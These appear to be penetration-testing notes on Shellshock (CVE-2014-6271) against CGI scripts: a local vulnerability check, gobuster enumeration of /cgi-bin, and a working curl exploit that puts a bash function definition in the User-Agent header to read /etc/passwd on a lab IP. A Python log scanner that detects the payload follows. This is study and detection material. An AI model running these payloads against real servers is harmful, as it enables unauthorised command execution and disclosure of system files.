CGI Applications
CGI scripts and programs are kept in the /cgi-bin directory

Shellshock Exploit
(CVE-2014-6271)
Affects GNU bash <= 4.3
Checking (if we already have shell access)
env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"
Finding .cgi files
$ gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi
Exploitation
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.129.204.231/cgi-bin/access.cgi
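Detection
A defender-side complement to the commands above, added here as an example and not part of the original notes: a Python scan of web-server access logs for the `() {` function-definition prefix that the User-Agent payload relies on. The log lines are constructed, and the Apache/nginx "combined" log format is an assumption.

```python
import re

# Shellshock payloads begin a header value with a bash function definition, "() {".
# Whitespace between the tokens varies, so match it loosely.
FUNC_DEF = re.compile(r"\(\)\s*\{")

# Assumed "combined" log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field; the server escapes embedded quotes as \"
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + '$'
)

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" 200 1843 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 404 209 "() { :;}; echo probe" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /docs/func() HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]


def find_shellshock(lines):
    """Return one finding per log line whose request, Referer or User-Agent contains '() {'."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not in the assumed format; skip rather than guess
        host, request, status, referer, agent = m.groups()
        named = (("request", request), ("referer", referer), ("agent", agent))
        fields = [name for name, value in named if FUNC_DEF.search(value)]
        if not fields:
            continue
        parts = request.split(" ")
        path = parts[1] if len(parts) > 1 else ""
        findings.append({
            "line": lineno, "host": host, "path": path, "status": int(status),
            "fields": fields,
            # CGI targets matter most: that is where headers become environment variables
            "cgi": "/cgi-bin/" in path or path.endswith(".cgi"),
        })
    return findings


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

The combined format records only the request line, Referer and User-Agent, so a payload sent in any other header is not visible to this scan unless the server's log format is extended to include it.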